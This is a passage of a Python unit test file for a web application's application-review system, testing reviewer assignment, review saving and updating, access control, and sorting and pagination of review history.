response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 3) def setup_one_reviewer_three_candidates_and_one_completed_review(self): responses = [ Response(1, 5, True), Response(1, 6, True), Response(1, 7, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 1, 'I want to do a PhD.'), Answer(2, 2, 'I will share by writing a blog.'), Answer(3, 1, 'I want to solve new problems.'), Answer(3, 2, 'I will share by tutoring.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1), ResponseReviewer(3, 1) ] db.session.add_all(response_reviewers) db.session.commit() review_response = ReviewResponse(1, 1, 1) db.session.add(review_response) db.session.commit() def test_one_reviewer_three_candidates_and_one_completed_review(self): self.seed_static_data() self.setup_one_reviewer_three_candidates_and_one_completed_review() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 2) def setup_one_reviewer_three_candidates_with_one_withdrawn_response_and_one_unsubmitted_response(self): withdrawn_response = Response(1, 5, True) withdrawn_response.withdraw_response() responses = [ withdrawn_response, Response(1, 6, False), Response(1, 7, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 1, 'I want to do a PhD.'), Answer(2, 2, 'I will share by writing a blog.'), Answer(3, 1, 'I want to solve new problems.'), Answer(3, 2, 'I will share by tutoring.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1), ResponseReviewer(3, 1) ] db.session.add_all(response_reviewers) db.session.commit() def test_one_reviewer_three_candidates_with_one_withdrawn_response_and_one_unsubmitted_response(self): self.seed_static_data() self.setup_one_reviewer_three_candidates_with_one_withdrawn_response_and_one_unsubmitted_response() header = self.get_auth_header_for('r1@r.com') params = {'event_id': 1} response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 1) def setup_multiple_reviewers_with_different_subsets_of_candidates_and_reviews_completed(self): responses = [ Response(1, 5, True), Response(1, 6, True), Response(1, 7, True), Response(1, 8, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 1, 'I want to do a PhD.'), Answer(2, 2, 'I will share by writing a blog.'), Answer(3, 1, 'I want to solve new problems.'), Answer(3, 2, 'I will share by tutoring.'), Answer(4, 1, 'I want to exchange ideas with like minded people'), Answer(4, 2, 'I will mentor people interested in ML.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1), ResponseReviewer(3, 1), ResponseReviewer(2, 2), ResponseReviewer(3, 2), ResponseReviewer(1, 3), ResponseReviewer(2, 3), ResponseReviewer(3, 3), ResponseReviewer(4, 3), ResponseReviewer(1, 4) ] db.session.add_all(response_reviewers) db.session.commit() review_responses = [ ReviewResponse(1, 2, 2), ReviewResponse(1, 3, 1), ReviewResponse(1, 3, 2), ReviewResponse(1, 4, 1) ] db.session.add_all(review_responses) db.session.commit() def test_multiple_reviewers_with_different_subsets_of_candidates_and_reviews_completed(self): self.seed_static_data() self.setup_multiple_reviewers_with_different_subsets_of_candidates_and_reviews_completed() params = {'event_id': 1} header = self.get_auth_header_for('r1@r.com') response1 = self.app.get('/api/v1/review', headers=header, data=params) data1 = json.loads(response1.data) header = self.get_auth_header_for('r2@r.com') response2 = self.app.get('/api/v1/review', headers=header, data=params) data2 = json.loads(response2.data) header = self.get_auth_header_for('r3@r.com') response3 = self.app.get('/api/v1/review', headers=header, data=params) data3 = json.loads(response3.data) header = self.get_auth_header_for('r4@r.com') response4 = self.app.get('/api/v1/review', headers=header, data=params) data4 = json.loads(response4.data) self.assertEqual(data1['reviews_remaining_count'], 3) self.assertEqual(data2['reviews_remaining_count'], 1) self.assertEqual(data3['reviews_remaining_count'], 2) self.assertEqual(data4['reviews_remaining_count'], 0) def test_skipping(self): self.seed_static_data() self.setup_one_reviewer_three_candidates() params = {'event_id': 1, 'skip': 1} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['response']['user_id'], 6) self.assertEqual(data['response']['answers'][0]['value'], 'I want to do a PhD.') self.assertEqual(data['user']['affiliation'], 'RU') self.assertEqual(data['user']['department'], 'Chem') self.assertEqual(data['user']['nationality_country'], 'Botswana') self.assertEqual(data['user']['residence_country'], 'Namibia') self.assertEqual(data['user']['user_category'], 'Student') def test_high_skip_defaults_to_last_review(self): self.seed_static_data() self.setup_one_reviewer_three_candidates() params = {'event_id': 1, 'skip': 5} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['response']['user_id'], 7) self.assertEqual(data['response']['answers'][1]['value'], 'I will share by tutoring.') self.assertEqual(data['user']['affiliation'], 'UFH') self.assertEqual(data['user']['department'], 'Phys') self.assertEqual(data['user']['nationality_country'], 'Zimbabwe') self.assertEqual(data['user']['residence_country'], 'Mozambique') self.assertEqual(data['user']['user_category'], 'MSc') def setup_candidate_who_has_applied_to_multiple_events(self): responses = [ Response(1, 5, True), Response(2, 5, True) ] db.session.add_all(responses) db.session.commit() answers = [ Answer(1, 1, 'I will learn alot.'), Answer(1, 2, 'I will share by doing talks.'), Answer(2, 3, 'Yes I worked on a vision task.'), Answer(2, 4, 'Yes I want the travel award.') ] db.session.add_all(answers) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(2, 1) ] db.session.add_all(response_reviewers) db.session.commit() def test_filtering_on_event_when_candidate_has_applied_to_more_than(self): self.seed_static_data() self.setup_candidate_who_has_applied_to_multiple_events() params = {'event_id': 2} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews_remaining_count'], 1) self.assertEqual(data['response']['user_id'], 5) self.assertEqual(data['response']['answers'][0]['value'], 'Yes I worked on a vision task.') self.assertEqual(data['user']['affiliation'], 'UWC') self.assertEqual(data['user']['department'], 'CS') self.assertEqual(data['user']['nationality_country'], 'South Africa') self.assertEqual(data['user']['residence_country'], 'Egypt') self.assertEqual(data['user']['user_category'], 'Honours') def setup_multi_choice_answer(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() answer = Answer(1, 5, 'indaba-2017') db.session.add(answer) db.session.commit() response_reviewer = ResponseReviewer(1, 1) db.session.add(response_reviewer) db.session.commit() def test_multi_choice_answers_use_label_instead_of_value(self): self.seed_static_data() self.setup_multi_choice_answer() params = {'event_id': 1} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/review', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['response']['answers'][0]['value'], 'Yes, I attended the 2017 Indaba') def test_review_response_not_found(self): self.seed_static_data() params = {'id': 55} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/reviewresponse', headers=header, data=params) data = json.loads(response.data) self.assertEqual(response.status_code, REVIEW_RESPONSE_NOT_FOUND[1]) def setup_review_response(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() answer = Answer(1, 1, 'To learn alot') db.session.add(answer) db.session.commit() self.review_response = ReviewResponse(1, 1, 1) self.review_response.review_scores.append(ReviewScore(1, 'answer1')) self.review_response.review_scores.append(ReviewScore(2, 'answer2')) db.session.add(self.review_response) db.session.commit() db.session.flush() def test_review_response(self): self.seed_static_data() self.setup_review_response() params = {'id': self.review_response.id} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/reviewresponse', headers=header, data=params) data = json.loads(response.data) print(data) self.assertEqual(data['review_form']['id'], 1) self.assertEqual(data['review_response']['reviewer_user_id'], 1) self.assertEqual(data['review_response']['response_id'], 1) self.assertEqual(data['review_response']['scores'][0]['value'], 'answer1') self.assertEqual(data['review_response']['scores'][1]['value'], 'answer2') def test_prevent_saving_review_response_reviewer_was_not_assigned_to_response(self): self.seed_static_data() params = json.dumps({'review_form_id': 1, 'response_id': 1, 'scores': [{'review_question_id': 1, 'value': 'test_answer'}]}) header = self.get_auth_header_for('r1@r.com') response = self.app.post('/api/v1/reviewresponse', headers=header, data=params, content_type='application/json') self.assertEqual(response.status_code, FORBIDDEN[1]) def setup_response_reviewer(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() response_reviewer = ResponseReviewer(1, 1) db.session.add(response_reviewer) db.session.commit() def test_saving_review_response(self): self.seed_static_data() self.setup_response_reviewer() params = json.dumps({'review_form_id': 1, 'response_id': 1, 'scores': [{'review_question_id': 1, 'value': 'test_answer'}]}) header = self.get_auth_header_for('r1@r.com') response = self.app.post('/api/v1/reviewresponse', headers=header, data=params, content_type='application/json') review_scores = db.session.query(ReviewScore).filter_by(review_response_id=1).all() self.assertEqual(response.status_code, 201) self.assertEqual(len(review_scores), 1) self.assertEqual(review_scores[0].value, 'test_answer') def setup_existing_review_response(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() response_reviewer = ResponseReviewer(1, 1) db.session.add(response_reviewer) db.session.commit() review_response = ReviewResponse(1, 1, 1) review_response.review_scores = [ReviewScore(1, 'test_answer1'), ReviewScore(2, 'test_answer2')] db.session.add(review_response) db.session.commit() def test_updating_review_response(self): self.seed_static_data() self.setup_existing_review_response() params = json.dumps({'review_form_id': 1, 'response_id': 1, 'scores': [{'review_question_id': 1, 'value': 'test_answer3'}, {'review_question_id': 2, 'value': 'test_answer4'}]}) header = self.get_auth_header_for('r1@r.com') response = self.app.put('/api/v1/reviewresponse', headers=header, data=params, content_type='application/json') review_scores = db.session.query(ReviewScore).filter_by(review_response_id=1).order_by(ReviewScore.review_question_id).all() self.assertEqual(response.status_code, 200) self.assertEqual(len(review_scores), 2) self.assertEqual(review_scores[0].value, 'test_answer3') self.assertEqual(review_scores[1].value, 'test_answer4') def test_user_cant_assign_responsesreviewer_without_system_or_event_admin_role(self): self.seed_static_data() params = {'event_id': 1, 'reviewer_user_email': 'r2@r.com', 'num_reviews': 10} header = self.get_auth_header_for('c1@c.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) self.assertEqual(response.status_code, FORBIDDEN[1]) def test_reviewer_not_found(self): self.seed_static_data() params = {'event_id': 1, 'reviewer_user_email': 'non_existent@user.com', 'num_reviews': 10} header = self.get_auth_header_for('sa@sa.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) self.assertEqual(response.status_code, USER_NOT_FOUND[1]) def test_add_reviewer_with_no_roles(self): self.seed_static_data() params = {'event_id': 1, 'reviewer_user_email': 'r1@r.com', 'num_reviews': 10} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) event_roles = db.session.query(EventRole).filter_by(user_id=1, event_id=1).all() self.assertEqual(len(event_roles), 1) self.assertEqual(event_roles[0].role, 'reviewer') def test_add_reviewer_with_a_role(self): self.seed_static_data() params = {'event_id': 1, 'reviewer_user_email': 'ea@ea.com', 'num_reviews': 10} header = self.get_auth_header_for('sa@sa.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) event_roles = db.session.query(EventRole).filter_by(user_id=10, event_id=1).order_by(EventRole.id).all() self.assertEqual(len(event_roles), 2) self.assertEqual(event_roles[0].role, 'admin') self.assertEqual(event_roles[1].role, 'reviewer') def setup_responses_without_reviewers(self): responses = [ Response(1, 5, True), Response(1, 6, True), Response(1, 7, True), Response(1, 8, True) ] db.session.add_all(responses) db.session.commit() def test_adding_first_reviewer(self): self.seed_static_data() self.setup_responses_without_reviewers() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 4} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(response.status_code, 201) self.assertEqual(len(response_reviewers), 4) def test_limit_of_num_reviews(self): self.seed_static_data() self.setup_responses_without_reviewers() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(len(response_reviewers), 3) def setup_reviewer_with_own_response(self): responses = [ Response(1, 3, True), # reviewer Response(1, 5, True) # someone else ] db.session.add_all(responses) db.session.commit() def test_reviewer_does_not_get_assigned_to_own_response(self): self.seed_static_data() self.setup_reviewer_with_own_response() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(len(response_reviewers), 1) self.assertEqual(response_reviewers[0].response_id, 2) def setup_withdrawn_and_unsubmitted_responses(self): responses = [ Response(1, 5, is_submitted=False, is_withdrawn=False), Response(1, 6, is_submitted=True, is_withdrawn=True), Response(1, 7, is_submitted=True, is_withdrawn=False) ] db.session.add_all(responses) db.session.commit() def test_withdrawn_and_unsubmitted_responses_are_not_assigned_reviewers(self): self.seed_static_data() self.setup_withdrawn_and_unsubmitted_responses() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(len(response_reviewers), 1) self.assertEqual(response_reviewers[0].response_id, 3) def setup_response_with_three_reviewers(self): response = Response(1, 5, True) db.session.add(response) db.session.commit() response_reviewers = [ ResponseReviewer(1, 1), ResponseReviewer(1, 2), ResponseReviewer(1, 4) ] db.session.add_all(response_reviewers) db.session.commit() def test_response_with_three_reviewers_does_not_get_assigned_another_reviewer(self): self.seed_static_data() self.setup_response_with_three_reviewers() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).filter_by(reviewer_user_id=3).all() self.assertEqual(len(response_reviewers), 0) def setup_responsereview_with_different_reviewer(self): response = Response(1, 5, is_submitted=True) db.session.add(response) db.session.commit() response_reviewer = ResponseReviewer(1, 1) db.session.add(response_reviewer) db.session.commit() def test_response_will_get_multiple_reviewers_assigned(self): self.seed_static_data() self.setup_responsereview_with_different_reviewer() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).order_by(ResponseReviewer.reviewer_user_id).all() self.assertEqual(len(response_reviewers), 2) self.assertEqual(response_reviewers[0].reviewer_user_id, 1) self.assertEqual(response_reviewers[1].reviewer_user_id, 3) def setup_reviewer_is_not_assigned_to_response_more_than_once(self): response = Response(1,5,is_submitted=True) db.session.add(response) db.session.commit() def setup_count_reviews_allocated_and_completed(self): db.session.add_all([ EventRole('reviewer', 1, 1), EventRole('reviewer', 2, 1), EventRole('reviewer', 3, 1), EventRole('reviewer', 4, 1) ]) responses = [ Response(1, 5, True), #1 Response(1, 6, True), #2 Response(1, 7, True), #3 Response(1, 8, True), #4 Response(2, 5, True), #5 Response(2, 6, True) #6 ] db.session.add_all(responses) response_reviewers = [ ResponseReviewer(1, 2), ResponseReviewer(2, 2), ResponseReviewer(3, 2), ResponseReviewer(4, 2), ResponseReviewer(6, 2), ResponseReviewer(2, 3), ResponseReviewer(4, 3), ResponseReviewer(3, 4), ResponseReviewer(5, 1), ] db.session.add_all(response_reviewers) # review form, review_user_id, response_id review_responses = [ ReviewResponse(1, 3, 2), ReviewResponse(1, 3, 4), ReviewResponse(1, 2, 1), ReviewResponse(1, 2, 3), ReviewResponse(1, 2, 4), ReviewResponse(2, 1, 5), ReviewResponse(2, 2, 6) ] db.session.add_all(review_responses) db.session.commit() # response 1 - 1 review assigned - 1 complete # response 2 - 2 reviews - 1 complete # response 3 - 2 reviews - 1 complete # response 4 - 2 reviews - 1 complete # response 5 - 1 review - 1 complete # response 6 - 1 review - 1 complete # reviewer 1 - 1 review assigned (1 from event 2) - 1 complete # reviewer 2 - 5 reviews assigned (1 from event 2)- 3 complete # reviewer 3 - 2 reviews assigned - 2 complete # reviewer 4 - 1 review assigned - none complete # total assigned reviews: 9 # total required review = 6*3 = 18 # total unallocated: 18 - 9 = 9 # total completed reviews: 6 @SkipTest def test_count_reviews_allocated_and_completed(self): self.seed_static_data() self.setup_count_reviews_allocated_and_completed() header = self.get_auth_header_for('ea@ea.com') params = {'event_id': 1} response = self.app.get('/api/v1/reviewassignment', headers=header, data=params) data = json.loads(response.data) data = sorted(data, key=lambda k: k['email']) LOGGER.debug(data) self.assertEqual(len(data),3) self.assertEqual(data[0]['email'], 'r2@r.com') self.assertEqual(data[0]['reviews_allocated'], 4) self.assertEqual(data[0]['reviews_completed'], 3) self.assertEqual(data[1]['email'], 'r3@r.com') self.assertEqual(data[1]['reviews_allocated'], 2) self.assertEqual(data[1]['reviews_completed'], 2) self.assertEqual(data[2]['email'], 'r4@r.com') self.assertEqual(data[2]['reviews_allocated'], 1) self.assertEqual(data[2]['reviews_completed'], 0) def test_reviewer_is_not_assigned_to_response_more_than_once(self): self.seed_static_data() self.setup_reviewer_is_not_assigned_to_response_more_than_once() params = {'event_id': 1, 'reviewer_user_email': 'r3@r.com', 'num_reviews': 3} header = self.get_auth_header_for('ea@ea.com') response = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response2 = self.app.post('/api/v1/reviewassignment', headers=header, data=params) response_reviewers = db.session.query(ResponseReviewer).all() self.assertEqual(len(response_reviewers), 1) def setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores(self): second_reviewer = EventRole('reviewer', 2, 1) db.session.add(second_reviewer) db.session.commit() responses = [ Response(1, 5, is_submitted=True), Response(1, 6, is_submitted=True), Response(1, 7, is_submitted=True) ] db.session.add_all(responses) db.session.commit() final_verdict_options = [ {'label': 'Yes', 'value': 2}, {'label': 'No', 'value': 0}, {'label': 'Maybe', 'value': 1}, ] verdict_question = ReviewQuestion(1, None, None, 'Final Verdict', 'multi-choice', None, final_verdict_options, True, 3, None, None, 0) db.session.add(verdict_question) db.session.commit() review_responses = [ ReviewResponse(1,3,1), ReviewResponse(1,3,2), ReviewResponse(1,2,1), ReviewResponse(1,2,2), ReviewResponse(1,3,3) ] review_responses[0].review_scores = [ReviewScore(1, '23'), ReviewScore(5, '1')] review_responses[1].review_scores = [ReviewScore(1, '55'), ReviewScore(5, '2')] review_responses[2].review_scores = [ReviewScore(1, '45'), ReviewScore(2, '67'), ReviewScore(5, 'No')] review_responses[3].review_scores = [ReviewScore(1, '220'), ReviewScore(5, '2')] review_responses[4].review_scores = [ReviewScore(1, '221'), ReviewScore(5, '1')] db.session.add_all(review_responses) db.session.commit() def test_review_history_returned(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 3) self.assertEqual(data['num_entries'], 3) self.assertEqual(data['reviews'][0]['review_response_id'], 1) self.assertEqual(data['reviews'][0]['nationality_country'], 'South Africa') self.assertEqual(data['reviews'][0]['residence_country'], 'Egypt') self.assertEqual(data['reviews'][0]['affiliation'], 'UWC') self.assertEqual(data['reviews'][0]['department'], 'CS') self.assertEqual(data['reviews'][0]['user_category'], 'Honours') self.assertEqual(data['reviews'][0]['final_verdict'], 'Maybe') self.assertEqual(data['reviews'][1]['review_response_id'], 2) self.assertEqual(data['reviews'][1]['nationality_country'], 'Botswana') self.assertEqual(data['reviews'][1]['residence_country'], 'Namibia') self.assertEqual(data['reviews'][1]['affiliation'], 'RU') self.assertEqual(data['reviews'][1]['department'], 'Chem') self.assertEqual(data['reviews'][1]['user_category'], 'Student') self.assertEqual(data['reviews'][1]['final_verdict'], 'Yes') self.assertEqual(data['reviews'][2]['review_response_id'], 5) self.assertEqual(data['reviews'][2]['nationality_country'], 'Zimbabwe') self.assertEqual(data['reviews'][2]['residence_country'], 'Mozambique') self.assertEqual(data['reviews'][2]['affiliation'], 'UFH') self.assertEqual(data['reviews'][2]['department'], 'Phys') self.assertEqual(data['reviews'][2]['user_category'], 'MSc') self.assertEqual(data['reviews'][2]['final_verdict'], 'Maybe') def test_brings_back_only_logged_in_reviewer_reviewresponses(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r2@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 2) self.assertEqual(data['reviews'][0]['review_response_id'], 3) self.assertEqual(data['reviews'][1]['review_response_id'], 4) def test_logged_in_user_not_reviewer(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('c1@c.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) self.assertEqual(response.status_code, FORBIDDEN[1]) def setup_reviewer_with_no_reviewresponses(self): reviewer = EventRole('reviewer', 1, 1) db.session.add(reviewer) db.session.commit() def test_reviewer_with_no_reviewresponses(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_reviewer_with_no_reviewresponses() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['num_entries'], 0) self.assertEqual(data['reviews'], []) def test_order_by_reviewresponseid(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['review_response_id'], 1) self.assertEqual(data['reviews'][1]['review_response_id'], 2) self.assertEqual(data['reviews'][2]['review_response_id'], 5) def setup_reviewresponses_with_unordered_timestamps(self): final_verdict_options = [ {'label': 'Yes', 'value': 2}, {'label': 'No', 'value': 0}, {'label': 'Maybe', 'value': 1}, ] verdict_question = ReviewQuestion(1, None, None, 'Final Verdict', 'multi-choice', None, final_verdict_options, True, 3, None, None, 0) db.session.add(verdict_question) db.session.commit() responses = [ Response(1, 5, is_submitted=True), Response(1, 6, is_submitted=True), Response(1, 7, is_submitted=True) ] db.session.add_all(responses) db.session.commit() review_response_1 = ReviewResponse(1,3,1) review_response_2 = ReviewResponse(1,3,2) review_response_3 = ReviewResponse(1,3,3) review_response_1.submitted_timestamp = datetime(2019, 1, 1) review_response_2.submitted_timestamp = datetime(2018, 1, 1) review_response_3.submitted_timestamp = datetime(2018, 6, 6) review_responses = [review_response_1, review_response_2, review_response_3] review_responses[0].review_scores = [ReviewScore(1, '67'), ReviewScore(5, 'Yes')] review_responses[1].review_scores = [ReviewScore(1, '23'), ReviewScore(5, 'Yes')] review_responses[2].review_scores = [ReviewScore(1, '53'), ReviewScore(5, 'Yes')] db.session.add_all(review_responses) db.session.commit() def test_order_by_submittedtimestamp(self): self.seed_static_data() self.setup_reviewresponses_with_unordered_timestamps() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'submitted_timestamp'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) LOGGER.debug(data) self.assertEqual(data['reviews'][0]['submitted_timestamp'], '2018-01-01T00:00:00') self.assertEqual(data['reviews'][1]['submitted_timestamp'], '2018-06-06T00:00:00') self.assertEqual(data['reviews'][2]['submitted_timestamp'], '2019-01-01T00:00:00') def test_order_by_nationalitycountry(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'nationality_country'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['nationality_country'], 'Botswana') self.assertEqual(data['reviews'][1]['nationality_country'], 'South Africa') self.assertEqual(data['reviews'][2]['nationality_country'], 'Zimbabwe') def test_order_by_residencecountry(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'residence_country'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['residence_country'], 'Egypt') self.assertEqual(data['reviews'][1]['residence_country'], 'Mozambique') self.assertEqual(data['reviews'][2]['residence_country'], 'Namibia') def test_order_by_affiliation(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'affiliation'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['affiliation'], 'RU') self.assertEqual(data['reviews'][1]['affiliation'], 'UFH') self.assertEqual(data['reviews'][2]['affiliation'], 'UWC') def test_order_by_department(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'department'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['department'], 'CS') # ascii ordering orders capital letters before lowercase self.assertEqual(data['reviews'][1]['department'], 'Chem') self.assertEqual(data['reviews'][2]['department'], 'Phys') def test_order_by_usercategory(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'user_category'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['user_category'], 'Honours') self.assertEqual(data['reviews'][1]['user_category'], 'MSc') self.assertEqual(data['reviews'][2]['user_category'], 'Student') def test_order_by_finalverdict(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'final_verdict'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['final_verdict'], 'Maybe') self.assertEqual(data['reviews'][1]['final_verdict'], 'Maybe') self.assertEqual(data['reviews'][2]['final_verdict'], 'Yes') def setup_two_extra_responses_for_reviewer3(self): responses = [ Response(1, 8, is_submitted=True), Response(1, 1, is_submitted=True) ] db.session.add_all(responses) db.session.commit() review_responses = [ ReviewResponse(1,3,4), ReviewResponse(1,3,5) ] review_responses[0].review_scores = [ReviewScore(1, '89'), ReviewScore(5, 'Maybe')] review_responses[1].review_scores = [ReviewScore(1, '75'), ReviewScore(5, 'Yes')] db.session.add_all(review_responses) db.session.commit() def test_first_page_in_pagination(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_two_extra_responses_for_reviewer3() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 2) self.assertEqual(data['num_entries'], 5) self.assertEqual(data['reviews'][0]['review_response_id'], 1) self.assertEqual(data['reviews'][1]['review_response_id'], 2) def test_middle_page_in_pagination(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_two_extra_responses_for_reviewer3() params ={'event_id' : 1, 'page_number' : 1, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 2) self.assertEqual(data['num_entries'], 5) self.assertEqual(data['reviews'][0]['review_response_id'], 5) self.assertEqual(data['reviews'][1]['review_response_id'], 6) def test_last_page_in_pagination(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_two_extra_responses_for_reviewer3() params ={'event_id' : 1, 'page_number' : 2, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, 